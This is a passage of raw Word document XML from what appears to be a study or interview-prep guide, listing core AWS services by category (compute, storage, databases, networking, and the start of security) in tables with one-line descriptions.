    <w:p w14:paraId="2B199FEA" w14:textId="79B87C2D" w:rsidR="00BF7CA0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BF7CA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118A682">
          <v:rect id="_x0000_i3422" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C2C7A" w14:textId="0E18BF77" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="00BF7CA0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13493126" w14:textId="4E26D9F1" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="006C0B8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="847" w:name="_Toc196308327"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>AWS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="847"/>
    </w:p>
    <w:p w14:paraId="0A0A4C15" w14:textId="77777777" w:rsidR="009B11FE" w:rsidRPr="00CE4B95" w:rsidRDefault="009B11FE" w:rsidP="009B11FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D8DD27" w14:textId="4AB54DDF" w:rsidR="009B11FE" w:rsidRPr="00CE4B95" w:rsidRDefault="009B11FE" w:rsidP="009B11FE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="848" w:name="_Toc196308328"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain AWS services?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="848"/>
    </w:p>
    <w:p w14:paraId="39D9A322" w14:textId="33A25A55" w:rsidR="00117C28" w:rsidRPr="00813DA5" w:rsidRDefault="00117C28" w:rsidP="00EC3E21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813DA5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Amazon Web Services (AWS) is a cloud computing platform offering on-demand resources like servers, databases, storage, and more. It follows a pay-as-you-go model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D541389" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95"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213391">
          <v:rect id="_x0000_i3423" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E53D9" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C28">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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re AWS Services (by Category)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02638706" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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 xml:space="preserve">1. </w:t>
      </w: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Compute Servi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1"/>
        <w:gridCol w:w="7653"/>
      </w:tblGrid>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="1AAEF29D" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F3FA6D4" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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ervice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07EFEEF5" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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117C28" w:rsidRPr="00CE4B95" w14:paraId="627C8712" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="449E410F" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="001E1347">
            <w:p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C2 (Elastic Compute Cloud)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0632B5FE"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irtual servers in the cloud. You can choose OS, size, and performance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="5ACF89A2" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E56A769"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ambda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D615A3C"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un code without provisioning servers (serverless). Supports auto-scaling, pay-per-use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="551B43C8" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66E003E2"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lastic Beanstalk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B01F4DB"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latform-as-a-Service (PaaS) for deploying apps (e.g., Java, Node.js).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="0F9AE92B" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="120441C6"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CS / EKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="485C14E8"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tainer services: ECS (Amazon managed), EKS (Kubernetes).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="2E6E5144" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44EFC4C7"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ightsail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D5CDBF0"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implified VPS service for small apps/websites.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="593077B1" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95"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AC4161E">
          <v:rect id="_x0000_i3424" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="336CA0E9" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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 xml:space="preserve">2. </w:t>
      </w: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torage Servi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99"/>
        <w:gridCol w:w="4478"/>
      </w:tblGrid>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="3D2082EB" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6965DBCA" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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ervice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03ADC9B9" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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117C28" w:rsidRPr="00CE4B95" w14:paraId="3E6D3AA8" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="234B3A81"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3 (Simple Storage Service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18102522"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bject storage for files, backups, media, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="18EBF5DD" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F70066F"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BS (Elastic Block Store)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07B3D480"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lock storage for EC2, like virtual hard drives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="1EB47479" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F43DE14"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FS (Elastic File System)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59AB60FB"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hared file storage across multiple EC2 instances.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="65C8BE67" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BE50008"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Glacier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B3EDD9D"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ng-term, low-cost archival storage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="613D64AF" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95"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9171F0">
          <v:rect id="_x0000_i3425" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C83AA" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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 xml:space="preserve">3. </w:t>
      </w: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Database Servi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90"/>
        <w:gridCol w:w="7407"/>
      </w:tblGrid>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="4F362D1D" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1163CE6D" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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ervice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CF2F1E2" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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117C28" w:rsidRPr="00CE4B95" w14:paraId="4DF03BE7" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C6D8C59"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DS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41AE11DE"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anaged relational databases (MySQL, PostgreSQL, Oracle, SQL Server, MariaDB).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="7CDE32DD" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1436E6FC"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urora</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="194811C3"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High-performance, MySQL/PostgreSQL-compatible cloud DB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="58B7B745" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73523DFF"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ynamoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35214743"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rverless NoSQL database, key-value store.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="01BB6D67" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AFEBB6B"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dshift</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3968BA2F"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ata warehousing for analytics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="2BBFAB6C" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E60B11B"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lastiCache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E77247D"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memory caching (Redis/Memcached).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73202A2B" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95"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CCD38A">
          <v:rect id="_x0000_i3426" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FEAEF4" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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 xml:space="preserve">4. </w:t>
      </w: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Networking &amp; CD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97"/>
        <w:gridCol w:w="7018"/>
      </w:tblGrid>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="77B90D52" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C8A9FE1" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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ervice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D246163" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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117C28" w:rsidRPr="00CE4B95" w14:paraId="013E0D64" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1140F475"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VPC (Virtual Private Cloud)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03EEF51D"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solated virtual network for AWS resources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="44847123" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44945D1D"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oute 53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AC50CB0"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NS and domain name management.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="3C076D56" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F52435"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oudFront</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="027ACC97"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tent Delivery Network (CDN) to serve static and dynamic content globally.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="63A9C572" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03FA43BB"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PI Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33050BFD"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xpose REST/HTTP APIs to the internet or internal apps.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="639F50A6" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03088CC5"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oad Balancer (ALB/ELB/NLB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A0D19AF"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Distribute traffic across EC2 or containers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71E5EDCF" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95"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1DC1652">
          <v:rect id="_x0000_i3427" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE1018E" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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 xml:space="preserve">5. </w:t>
      </w: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Security &amp; Identi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06"/>
        <w:gridCol w:w="5525"/>
      </w:tblGrid>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="1000817B" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F057907" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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ervice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1000F696" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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117C28" w:rsidRPr="00CE4B95" w14:paraId="4335DB22" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E740CDE"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AM (Identity and Access Management)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="451EA1E6"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r/role management and fine-grained permission control.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="39656E0B" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04247462"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KMS (Key Management Service)</w:t>
            </w:r>
